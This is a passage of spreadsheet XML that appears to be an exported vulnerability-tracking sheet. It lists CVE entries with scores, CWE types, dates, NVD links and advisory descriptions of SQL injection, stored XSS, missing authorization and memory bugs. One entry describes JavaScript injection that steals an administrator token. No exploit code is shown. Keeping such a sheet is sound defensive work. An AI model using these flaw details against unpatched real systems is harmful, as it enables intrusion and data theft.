        </is>
      </c>
      <c r="E4806" s="5" t="inlineStr"/>
      <c r="F4806" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4806" s="5" t="inlineStr"/>
      <c r="H4806" s="5" t="inlineStr">
        <is>
          <t>google:android, google:chrome</t>
        </is>
      </c>
      <c r="I4806" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4806" s="5" t="inlineStr"/>
      <c r="K4806" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L4806" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in TrustedWebActivities in Google Chrome on on Android prior to 153.0.8010.36 allowed a local attacker to obtain sensitive information via a co-installed app. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M4806" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87552</t>
        </is>
      </c>
    </row>
    <row r="4807">
      <c r="A4807" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4807" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87921</t>
        </is>
      </c>
      <c r="C4807" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4807" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4807" s="5" t="inlineStr"/>
      <c r="F4807" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4807" s="5" t="inlineStr"/>
      <c r="H4807" s="5" t="inlineStr"/>
      <c r="I4807" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4807" s="5" t="inlineStr"/>
      <c r="K4807" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="L4807" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in Rizwan17 inventory-management-system up to bfe78a330d01bb26b9daec5dc9ecd5c77900e03f. Affected is the function update_record of the file includes/manage.php. The manipulation of the argument update_category/cid/update_brand/update_product leads to sql injection. The attack is possible to be carried out remotely. The exploit is publicly available and might be used. This product adopts a rolling release strategy to maintain continuous delivery. Therefore, version details for affected or updated releases cannot be specified. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="M4807" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87921</t>
        </is>
      </c>
    </row>
    <row r="4808">
      <c r="A4808" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4808" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87922</t>
        </is>
      </c>
      <c r="C4808" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4808" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4808" s="5" t="inlineStr"/>
      <c r="F4808" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4808" s="5" t="inlineStr"/>
      <c r="H4808" s="5" t="inlineStr"/>
      <c r="I4808" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4808" s="5" t="inlineStr"/>
      <c r="K4808" s="5" t="inlineStr">
        <is>
          <t>CWE-287, CWE-306</t>
        </is>
      </c>
      <c r="L4808" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in Rizwan17 inventory-management-system up to bfe78a330d01bb26b9daec5dc9ecd5c77900e03f. Affected by this vulnerability is the function DBOperation.addCategory of the file includes/process.php of the component AJAX Backend. The manipulation of the argument userid results in missing authentication. The attack may be performed from remote. The exploit has been released to the public and may be used for attacks. This product utilizes a rolling release system for continuous delivery, and as such, version information for affected or updated releases is not disclosed. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="M4808" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87922</t>
        </is>
      </c>
    </row>
    <row r="4809">
      <c r="A4809" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4809" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87924</t>
        </is>
      </c>
      <c r="C4809" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4809" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4809" s="5" t="inlineStr"/>
      <c r="F4809" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4809" s="5" t="inlineStr"/>
      <c r="H4809" s="5" t="inlineStr"/>
      <c r="I4809" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4809" s="5" t="inlineStr"/>
      <c r="K4809" s="5" t="inlineStr">
        <is>
          <t>CWE-287, CWE-306</t>
        </is>
      </c>
      <c r="L4809" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in Rizwan17 inventory-management-system up to bfe78a330d01bb26b9daec5dc9ecd5c77900e03f. This affects an unknown part of the file includes/invoice_bill.php of the component Invoice Generation. Such manipulation of the argument order_date/invoice_no leads to missing authentication. It is possible to launch the attack remotely. The exploit has been disclosed publicly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M4809" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87924</t>
        </is>
      </c>
    </row>
    <row r="4810">
      <c r="A4810" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4810" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87925</t>
        </is>
      </c>
      <c r="C4810" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4810" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4810" s="5" t="inlineStr"/>
      <c r="F4810" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4810" s="5" t="inlineStr"/>
      <c r="H4810" s="5" t="inlineStr"/>
      <c r="I4810" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J4810" s="5" t="inlineStr"/>
      <c r="K4810" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="L4810" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in Rizwan17 inventory-management-system up to bfe78a330d01bb26b9daec5dc9ecd5c77900e03f. This vulnerability affects the function storeCustomerOrderInvoice of the file includes/manage.php. Performing a manipulation of the argument pro_name[] results in sql injection. The attack can be initiated remotely. The exploit is now public and may be used. Continious delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="M4810" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87925</t>
        </is>
      </c>
    </row>
    <row r="4811">
      <c r="A4811" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4811" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87933</t>
        </is>
      </c>
      <c r="C4811" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4811" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4811" s="5" t="inlineStr"/>
      <c r="F4811" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4811" s="5" t="inlineStr"/>
      <c r="H4811" s="5" t="inlineStr"/>
      <c r="I4811" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J4811" s="5" t="inlineStr"/>
      <c r="K4811" s="5" t="inlineStr">
        <is>
          <t>CWE-119, CWE-416</t>
        </is>
      </c>
      <c r="L4811" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in DaveGamble cJSON up to 1.7.19. The affected element is the function cJSONUtils_MergePatch of the file cJSON_Utils.c. The manipulation results in use after free. The attack may be launched remotely. The exploit has been made public and could be used. The pull request to fix this issue awaits acceptance.</t>
        </is>
      </c>
      <c r="M4811" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87933</t>
        </is>
      </c>
    </row>
    <row r="4812">
      <c r="A4812" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4812" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88055</t>
        </is>
      </c>
      <c r="C4812" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4812" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4812" s="5" t="inlineStr"/>
      <c r="F4812" s="5" t="inlineStr"/>
      <c r="G4812" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4812" s="5" t="inlineStr"/>
      <c r="I4812" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J4812" s="5" t="inlineStr"/>
      <c r="K4812" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4812" s="5" t="inlineStr">
        <is>
          <t>AnythingLLM is an application that turns pieces of content into context that any LLM can use as references during chatting. In 1.16.1 and earlier, the manager role can store meta_page_title or meta_page_favicon through /api/admin/system-preferences, and MetaGenerator inserts those values into production homepage HTML without escaping attribute values or text content. The values pass unchanged through server/models/systemSettings.js and reach MetaGenerator.generate() in server/index.js. #assembleMeta() in server/utils/boot/MetaGenerator.js concatenates the stored values into HTML. When an administrator visits the homepage /, injected JavaScript can read the administrator JWT and use it to create API keys, access or modify workspace and chat data, delete users, and perform other administrator actions. server/endpoints/admin.js accepts the manager-controlled settings before server/models/systemSettings.js returns them unchanged. No fixed version is available as of this review.</t>
        </is>
      </c>
      <c r="M4812" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88055</t>
        </is>
      </c>
    </row>
    <row r="4813">
      <c r="A4813" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4813" s="5" t="inlineStr">
        <is>
          <t>CVE-2022-26961</t>
        </is>
      </c>
      <c r="C4813" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4813" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4813" s="5" t="inlineStr"/>
      <c r="F4813" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4813" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4813" s="5" t="inlineStr"/>
      <c r="I4813" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J4813" s="5" t="inlineStr"/>
      <c r="K4813" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4813" s="5" t="inlineStr">
        <is>
          <t>Italtel NetMatch-S 5.0.0-20200703 allows Multiple Stored XSS under NP_IBCF-NATUP-01/NMSCI-WebGui/backup_restore.jsp and NP_IBCF-MIBER-03/NMSCI-WebGui/storage.jsp via the name parameter. A malicious user leveraging this vulnerability could inject arbitrary JavaScript. The malicious payload will then be triggered every time an authenticated user browses the page containing it.</t>
        </is>
      </c>
      <c r="M4813" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2022-26961</t>
        </is>
      </c>
    </row>
    <row r="4814">
      <c r="A4814" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4814" s="5" t="inlineStr">
        <is>
          <t>CVE-2024-11831</t>
        </is>
      </c>
      <c r="C4814" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4814" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4814" s="5" t="inlineStr"/>
      <c r="F4814" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="G4814" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4814" s="5" t="inlineStr"/>
      <c r="I4814" s="5" t="inlineStr">
        <is>
          <t>2025-02-10</t>
        </is>
      </c>
      <c r="J4814" s="5" t="inlineStr"/>
      <c r="K4814" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4814" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in npm-serialize-javascript. The vulnerability occurs because the serialize-javascript module does not properly sanitize certain inputs, such as regex or other JavaScript object types, allowing an attacker to inject malicious code. This code could be executed when deserialized by a web browser, causing Cross-site scripting (XSS) attacks. This issue is critical in environments where serialized data is sent to web clients, potentially compromising the security of the website or web application using this package.</t>
        </is>
      </c>
      <c r="M4814" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2024-11831</t>
        </is>
      </c>
    </row>
    <row r="4815">
      <c r="A4815" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4815" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-14945</t>
        </is>
      </c>
      <c r="C4815" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4815" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4815" s="5" t="inlineStr"/>
      <c r="F4815" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4815" s="5" t="inlineStr"/>
      <c r="H4815" s="5" t="inlineStr"/>
      <c r="I4815" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J4815" s="5" t="inlineStr"/>
      <c r="K4815" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4815" s="5" t="inlineStr">
        <is>
          <t>The Events Manager - Calendar, Bookings, Tickets, and more! plugin for WordPress is vulnerable to Stored Cross-Site Scripting via event attribute values in all versions up to, and including, 7.3.3. This is due to insufficient input sanitization when storing attribute values (using only `wp_unslash()` without sanitization) and lack of output escaping when rendering the '#_ATT{key}' placeholder. This makes it possible for authenticated attackers, with Author-level access and above, or unauthenticated attackers when anonymous event submissions are enabled, to inject arbitrary web scripts that execute when any user views the affected event page.</t>
        </is>
      </c>
      <c r="M4815" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-14945</t>
        </is>
      </c>
    </row>
    <row r="4816">
      <c r="A4816" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4816" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-5318</t>
        </is>
      </c>
      <c r="C4816" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4816" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4816" s="5" t="inlineStr"/>
      <c r="F4816" s="5" t="n">
        <v>0.015</v>
      </c>
      <c r="G4816" s="5" t="inlineStr"/>
      <c r="H4816" s="5" t="inlineStr">
        <is>
          <t>libssh:libssh, redhat:enterprise_linux, redhat:openshift_container_platform</t>
        </is>
      </c>
      <c r="I4816" s="5" t="inlineStr">
        <is>
          <t>2025-06-24</t>
        </is>
      </c>
      <c r="J4816" s="5" t="inlineStr"/>
      <c r="K4816" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L4816" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the libssh library in versions less than 0.11.2. An out-of-bounds read can be triggered in the sftp_handle function due to an incorrect comparison check that permits the function to access memory beyond the valid handle list and to return an invalid pointer, which is used in further processing. This vulnerability allows an authenticated remote attacker to potentially read unintended memory regions, exposing sensitive information or affect service behavior.</t>
        </is>
      </c>
      <c r="M4816" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-5318</t>
        </is>
      </c>
    </row>
    <row r="4817">
      <c r="A4817" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4817" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-64542</t>
        </is>
      </c>
      <c r="C4817" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4817" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4817" s="5" t="inlineStr"/>
      <c r="F4817" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4817" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4817" s="5" t="inlineStr"/>
      <c r="I4817" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4817" s="5" t="inlineStr"/>
      <c r="K4817" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L481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817" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-64542</t>
        </is>
      </c>
    </row>
    <row r="4818">
      <c r="A4818" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4818" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-64584</t>
        </is>
      </c>
      <c r="C4818" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4818" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4818" s="5" t="inlineStr"/>
      <c r="F4818" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4818" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4818" s="5" t="inlineStr"/>
      <c r="I4818" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4818" s="5" t="inlineStr"/>
      <c r="K4818" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L481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18" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-64584</t>
        </is>
      </c>
    </row>
    <row r="4819">
      <c r="A4819" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4819" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-64588</t>
        </is>
      </c>
      <c r="C4819" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4819" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4819" s="5" t="inlineStr"/>
      <c r="F4819" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4819" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4819" s="5" t="inlineStr"/>
      <c r="I4819" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4819" s="5" t="inlineStr"/>
      <c r="K4819" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L481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19" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-64588</t>
        </is>
      </c>
    </row>
    <row r="4820">
      <c r="A4820" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4820" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-64589</t>
        </is>
      </c>
      <c r="C4820" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4820" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4820" s="5" t="inlineStr"/>
      <c r="F4820" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4820" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4820" s="5" t="inlineStr"/>
      <c r="I4820" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4820" s="5" t="inlineStr"/>
      <c r="K4820" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L482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20" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-64589</t>
        </is>
      </c>
    </row>
    <row r="4821">
      <c r="A4821" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4821" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-64610</t>
        </is>
      </c>
      <c r="C4821" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4821" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4821" s="5" t="inlineStr"/>
      <c r="F4821" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4821" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4821" s="5" t="inlineStr"/>
      <c r="I4821" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4821" s="5" t="inlineStr"/>
      <c r="K4821" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L482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21" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-64610</t>
        </is>
      </c>
    </row>
    <row r="4822">
      <c r="A4822" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4822" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-64618</t>
        </is>
      </c>
      <c r="C4822" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4822" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4822" s="5" t="inlineStr"/>
      <c r="F4822" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4822" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4822" s="5" t="inlineStr"/>
      <c r="I4822" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4822" s="5" t="inlineStr"/>
      <c r="K4822" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L482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22" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-64618</t>
        </is>
      </c>
    </row>
    <row r="4823">
      <c r="A4823" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4823" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-64830</t>
        </is>
      </c>
      <c r="C4823" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4823" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4823" s="5" t="inlineStr"/>
      <c r="F4823" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4823" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4823" s="5" t="inlineStr"/>
      <c r="I4823" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4823" s="5" t="inlineStr"/>
      <c r="K4823" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L482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23" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-64830</t>
        </is>
      </c>
    </row>
    <row r="4824">
      <c r="A4824" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4824" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-64838</t>
        </is>
      </c>
      <c r="C4824" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4824" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4824" s="5" t="inlineStr"/>
      <c r="F4824" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4824" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4824" s="5" t="inlineStr"/>
      <c r="I4824" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4824" s="5" t="inlineStr"/>
      <c r="K4824" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L482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24" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-64838</t>
        </is>
      </c>
    </row>
    <row r="4825">
      <c r="A4825" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4825" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-64854</t>
        </is>
      </c>
      <c r="C4825" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4825" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4825" s="5" t="inlineStr"/>
      <c r="F4825" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4825" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4825" s="5" t="inlineStr"/>
      <c r="I4825" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4825" s="5" t="inlineStr"/>
      <c r="K4825" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L482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25" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-64854</t>
        </is>
      </c>
    </row>
    <row r="4826">
      <c r="A4826" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4826" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-64866</t>
        </is>
      </c>
      <c r="C4826" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4826" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4826" s="5" t="inlineStr"/>
      <c r="F4826" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4826" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4826" s="5" t="inlineStr"/>
      <c r="I4826" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4826" s="5" t="inlineStr"/>
      <c r="K4826" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L482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26" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-64866</t>
        </is>
      </c>
    </row>
    <row r="4827">
      <c r="A4827" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4827" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-64868</t>
        </is>
      </c>
      <c r="C4827" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4827" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4827" s="5" t="inlineStr"/>
      <c r="F4827" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4827" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4827" s="5" t="inlineStr"/>
      <c r="I4827" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4827" s="5" t="inlineStr"/>
      <c r="K4827" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L482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27" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-64868</t>
        </is>
      </c>
    </row>
    <row r="4828">
      <c r="A4828" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4828" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-11821</t>
        </is>
      </c>
      <c r="C4828" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4828" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4828" s="5" t="inlineStr"/>
      <c r="F4828" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4828" s="5" t="inlineStr"/>
      <c r="H4828" s="5" t="inlineStr"/>
      <c r="I4828" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4828" s="5" t="inlineStr"/>
      <c r="K4828" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L4828" s="5" t="inlineStr">
        <is>
          <t>The Eventin – Event Calendar, Event Registration, Tickets &amp; Booking (AI Powered) plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 4.1.17. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for authenticated attackers, with subscriber-level access and above, to view, create, update, clone, and delete notification flow event automation workflows that should be restricted to administrators.</t>
        </is>
      </c>
      <c r="M4828" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-11821</t>
        </is>
      </c>
    </row>
    <row r="4829">
      <c r="A4829" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4829" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12682</t>
        </is>
      </c>
      <c r="C4829" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D4829" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4829" s="5" t="inlineStr"/>
      <c r="F4829" s="5" t="inlineStr"/>
      <c r="G4829" s="5" t="inlineStr"/>
      <c r="H4829" s="5" t="inlineStr"/>
      <c r="I4829" s="5" t="inlineStr">
        <is>
